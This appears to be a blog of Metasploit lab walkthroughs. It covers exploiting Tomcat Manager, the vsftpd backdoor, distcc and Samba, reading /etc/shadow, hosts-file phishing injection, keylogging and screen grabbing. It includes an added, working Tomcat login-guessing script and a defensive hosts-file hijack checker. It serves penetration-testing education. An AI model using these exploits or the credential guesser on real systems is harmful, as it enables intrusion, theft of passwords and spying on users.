Saturday, June 11, 2016

METASPLOIT - Linux - Tomcat


- Layout for this exercise:

- Tomcat is an open-source Java servlet container and web server developed by the Apache Software Foundation (ASF). It implements several Java EE specifications, including Java Servlet, JavaServer Pages (JSP), the Java Expression Language (EL) and WebSocket, and provides a "pure Java" HTTP server environment in which Java code can run.

- Metasploit Framework provides an auxiliary module, auxiliary/scanner/http/tomcat_mgr_login, that attempts to log in to a Tomcat Application Manager instance with user/password combinations taken from wordlists:

- Required options for this module are the remote host (victim's IP) and port (8180, the port Tomcat listens on in this lab instead of the default 8080):

- The module finds a valid username and password using the default Tomcat wordlists shipped with Metasploit:



- Now a different module, an exploit that deploys a payload on Tomcat servers exposing the "manager" application, can be used.
Its required options are, aside from RHOST and RPORT, the username and password discovered in the previous step (tomcat/tomcat):

- The payload is set to a reverse Meterpreter, which connects back from the victim to the attacker:

- Its required options are the attacker's IP (LHOST) and listening port (LPORT):

- Launching the exploit, a Meterpreter session is obtained as expected:

- Also, using the discovered credentials the attacker gets easy access to the Tomcat Administration Tool web page:
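- The login check performed above by tomcat_mgr_login is simple enough to reproduce by hand. The script below is an added example, not code from the page or from Metasploit: it sends HTTP Basic authentication attempts to /manager/html for every user/password pair in two short constructed wordlists (stand-ins for Metasploit's much longer default lists) and reports the first pair the Manager accepts. So that it runs offline, it also starts a constructed local stand-in for the Manager login that answers 200 for one configured pair and 401 otherwise; against a real target you would point find_manager_credentials() at http://victim:8180 instead.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed stand-ins for Metasploit's default Tomcat wordlists
# (tomcat_mgr_default_users.txt / tomcat_mgr_default_pass.txt); the real lists are longer.
USERS = ["admin", "manager", "tomcat", "role1"]
PASSWORDS = ["", "admin", "tomcat", "s3cret", "manager"]


def try_login(base_url, user, password, timeout=5):
    """Send one HTTP Basic authentication attempt to /manager/html and return the status code."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(base_url + "/manager/html",
                  headers={"Authorization": "Basic " + token,
                           "User-Agent": "tomcat-mgr-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def find_manager_credentials(base_url, users=USERS, passwords=PASSWORDS):
    """Try every user/password pair; return (user, password, status) for the first hit, else None.

    200 means the account is valid and holds a Manager role. 403 means the password was
    accepted but the account lacks the role: the credentials are still valid, so they are
    reported too. 401 is a plain bad password and the search continues.
    """
    for user in users:
        for password in passwords:
            status = try_login(base_url, user, password)
            if status in (200, 403):
                return user, password, status
    return None


class FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the Tomcat Manager login, used only so the demo runs offline.

    Answers 200 for the one configured credential pair and 401 with a WWW-Authenticate
    challenge, as the real Manager does, for everything else.
    """
    valid = ("tomcat", "tomcat")

    def do_GET(self):
        expected = "Basic " + base64.b64encode(":".join(self.valid).encode()).decode()
        if self.path.startswith("/manager/html") and self.headers.get("Authorization") == expected:
            body, status = b"<html><title>/manager</title>Tomcat Web Application Manager</html>", 200
        else:
            body, status = b"401 Unauthorized", 401
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_manager(user, password):
    """Start the fake Manager on a random loopback port; return (server, base_url)."""
    handler = type("ConfiguredManager", (FakeManager,), {"valid": (user, password)})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    server, url = start_fake_manager("tomcat", "tomcat")
    try:
        print("checking", url, "->", find_manager_credentials(url))  # (tomcat, tomcat, 200)
    finally:
        server.shutdown()
```

- The 403 case matters in practice: Tomcat answers 403 when the password is right but the user has no manager role, and an operator who only looks for 200 would discard valid credentials that may well work elsewhere on the host.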

Friday, June 10, 2016

METASPLOIT - Linux - vsftpd


- Layout for this exercise:

- vsftpd is a GPL-licensed FTP server for UNIX systems, including Linux. In 2011 a malicious backdoor was inserted into the vsftpd-2.3.4.tar.gz archive offered on the project's download site: the tampered server opens a shell listening on TCP port 6200 when it receives a username containing the string ":)". The tampered archive was later removed, but Metasploit provides the module exploit/unix/ftp/vsftpd_234_backdoor to exploit systems that still run the backdoored build.

- The payload is set to cmd/unix/interact, which simply attaches to the shell opened by the backdoor:

- The only required option is the remote host's IP:

- Setting RHOST to the victim's IP:

- Launching the exploit, a remote shell is obtained:

METASPLOIT - Linux - Distcc


- Layout for this exercise:

- distcc is a program to distribute compilation of C, C++, Objective C or Objective C++ code across several machines on a network. A distccd daemon that accepts jobs from any host will also run whatever compiler command a client sends it, so Metasploit provides the module exploit/unix/misc/distcc_exec to take control of such a system:

- The payload cmd/unix/reverse makes the victim open a reverse shell connection back to the attacker:

- Required options are the remote and local hosts:

- Setting RHOST (victim) and LHOST (attacker):

- Launching the exploit, the result is a remote shell on the victim, running with the privileges of the distccd daemon (not necessarily root):

METASPLOIT - Linux - Samba


- Layout for this exercise:

- The attacker scans for open ports and services on the victim's machine using Nmap:

- On port 139 the victim is running Samba, a file-sharing service which in this case suffers from a command-injection vulnerability in its "username map script" option (CVE-2007-2447, Samba 3.0.20 through 3.0.25rc3): shell metacharacters in the username sent during authentication are executed as commands. Metasploit provides the exploit/multi/samba/usermap_script module to take advantage of it:

- Let's set the payload to cmd/unix/reverse:

- Required options include the remote host (victim) and local host (attacker):

- Setting remote host's IP:

- Setting attacker's IP:

- Launching the exploit, the result is a remote shell that allows post-exploitation of the victim:

- For instance, because smbd runs as root, the spawned shell is root as well, and the contents of both /etc/passwd and /etc/shadow can be read from it:

METASPLOIT - Windows 7 - Bypassing DNS by HOSTS file injection


- Layout for this exercise:

- The hosts file is a plain text file used by an operating system to map hostnames to IP addresses.

- In this exercise we'll see how to inject a crafted entry into the victim's hosts file, so that
a well-known domain name is redirected to the attacker's website.

- This is a form of phishing: a trustworthy website is masqueraded by a fake one.

- One of the keys to this attack is the name resolution order used by Windows systems: first, Windows 7 looks the name up in the hosts file; second, if there is no match there, Domain Name System (DNS) servers are queried.

- For this reason, if a crafted entry is injected into the victim's hosts file, the victim's browser silently goes to the attacker's server while the address bar still shows the legitimate name. (An HTTPS site would still raise a certificate warning unless the attacker also presents a certificate the victim's machine trusts, so plain HTTP sites are the easy targets.)

- Let's start the attack by backgrounding the active Meterpreter session:

- Now the post-exploitation module post/windows/manage/inject_hosts is used:

- Options for this module:

- The domain to be faked:

- The attacker's IP:

- The active Meterpreter session:

- Now all required options are set:

- The module is launched and completes successfully:

- As a result, back on the victim, the hosts file now has a new entry pointing the faked domain to the attacker's IP:

- On the attacker's side, to take advantage of the attack, a web server is set up on port 80 serving a welcome message:

- From the victim's machine, an attempt to connect to the faked domain is redirected to the attacker's website:

- Note that this redirection, or phishing, could be done on the victim's side with any kind of trustworthy website (banks, email services, businesses, ...) and on the attacker's side with a fake site where the victim could enter valid credentials, which would then be stolen by the attacker.

- It is interesting to check the different ways the ping and nslookup commands handle this situation.

- When pinging the faked domain, the name is resolved through the hosts file, so ping reports the attacker's IP:

- On the other hand, nslookup is a network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mappings.

- nslookup sends its queries straight to the configured DNS server, bypassing the hosts file, so it resolves the faked domain to its real IP. This difference is also a quick way to spot a tampered hosts file: if ping (the system resolver) and nslookup (DNS only) disagree about the same name, something is overriding DNS locally.

- As said before, the hosts file is consulted before DNS resolution by Windows systems.
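- The resolution order described above, and the ping/nslookup discrepancy it produces, can be turned into a small check. The script below is an added example, not code from the page or from Metasploit: it parses a constructed Windows hosts file (the default Microsoft comment block plus one injected entry of the kind inject_hosts writes and one ordinary ad-blocking entry), resolves names in ping's order (hosts first, then DNS) and in nslookup's (DNS only), and reports every hosts entry that overrides the DNS answer, distinguishing redirections from blocks. The DNS answers are a constructed table so the example runs offline; on a real Windows host you would read %SystemRoot%\System32\drivers\etc\hosts and replace FAKE_DNS with a real DNS query.

```python
import ipaddress

# Constructed Windows hosts file (not the page's screenshot): the default Microsoft comment block,
# one entry of the kind post/windows/manage/inject_hosts writes, and a typical ad-blocking entry.
HOSTS_FILE = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# 127.0.0.1       localhost
# ::1             localhost
192.168.1.50\twww.example-bank.com        # injected by the attacker
0.0.0.0          ads.example.net
"""

# Constructed stand-in for the answers the real DNS servers would give.
FAKE_DNS = {
    "www.example-bank.com": "203.0.113.10",
    "ads.example.net": "198.51.100.7",
    "www.example.com": "93.184.216.34",
}


def parse_hosts(text):
    """Parse hosts-file text into {hostname: ip}, the way the resolver reads it.

    '#' starts a comment, whitespace separates fields, one IP may carry several names,
    names are case-insensitive and the first entry for a name wins.
    """
    entries = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue  # malformed line: the resolver ignores it, and so do we
        for name in fields[1:]:
            entries.setdefault(name.lower(), ip)
    return entries


def resolve_like_ping(name, hosts, dns):
    """Mimic the Windows resolver order used by ping: hosts file first, then DNS.

    Returns (ip, source) with source 'hosts' or 'dns', or (None, None) if the name is unknown.
    """
    key = name.lower().rstrip(".")
    if key in hosts:
        return hosts[key], "hosts"
    if key in dns:
        return dns[key], "dns"
    return None, None


def resolve_like_nslookup(name, dns):
    """Mimic nslookup: ask the DNS server directly and never consult the hosts file."""
    return dns.get(name.lower().rstrip("."))


def find_hosts_hijacks(hosts, dns):
    """Compare every hosts entry against DNS and report the ones that override it.

    Returns {name: (kind, hosts_ip, dns_ip)}: kind is 'block' for loopback or unspecified
    targets (the usual ad-blocking pattern) and 'redirect' when traffic is sent to some other
    host, which is what a phishing injection looks like.
    """
    findings = {}
    for name, hosts_ip in hosts.items():
        dns_ip = dns.get(name)
        if dns_ip is None or dns_ip == hosts_ip:
            continue
        addr = ipaddress.ip_address(hosts_ip)
        kind = "block" if addr.is_loopback or addr.is_unspecified else "redirect"
        findings[name] = (kind, hosts_ip, dns_ip)
    return findings


if __name__ == "__main__":
    hosts = parse_hosts(HOSTS_FILE)
    print("ping     ->", resolve_like_ping("www.example-bank.com", hosts, FAKE_DNS))
    print("nslookup ->", resolve_like_nslookup("www.example-bank.com", FAKE_DNS))
    for name, finding in find_hosts_hijacks(hosts, FAKE_DNS).items():
        print(name, finding)
```

- Only the "redirect" findings deserve an alert: a hosts entry that sends a bank's name to a routable address outside the organisation is exactly the artefact this attack leaves behind, whereas loopback and 0.0.0.0 entries are usually deliberate blocking.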

METASPLOIT - Windows 7 - Keylogger


- Layout for this exercise:

- The keyscan_start Meterpreter command starts capturing keystrokes on the victim's machine. It only sees the keyboard input of the process Meterpreter lives in, so the session should first be migrated into a process running on the user's interactive desktop (explorer.exe, for instance):

- Now, let's suppose that a user on the victim's machine types a set of characters, for instance:

- The attacker can retrieve all those characters with the keyscan_dump command:

- Once the attack is successfully performed, the keyscan process can be stopped:

METASPLOIT - Windows 7 - Desktop screen grabbing


- Layout for this exercise:

- Windows systems automatically create an interactive window station. When an interactive user logs on, the system associates the interactive window station with the user's logon session. The system also creates the default input desktop for the interactive window station (WinSta0\Default). Processes started by the logged-on user are associated with the WinSta0\Default desktop. In other words, WinSta0 is the window station used to interact with users:

- The command enumdesktops enumerates all accessible desktops:

- Checking that the active desktop is the interactive one:

- Loading the espia extension in Meterpreter:

- Then the screengrab command grabs a screenshot of the active desktop on the victim's machine. The picture is saved under /root with a .jpeg extension: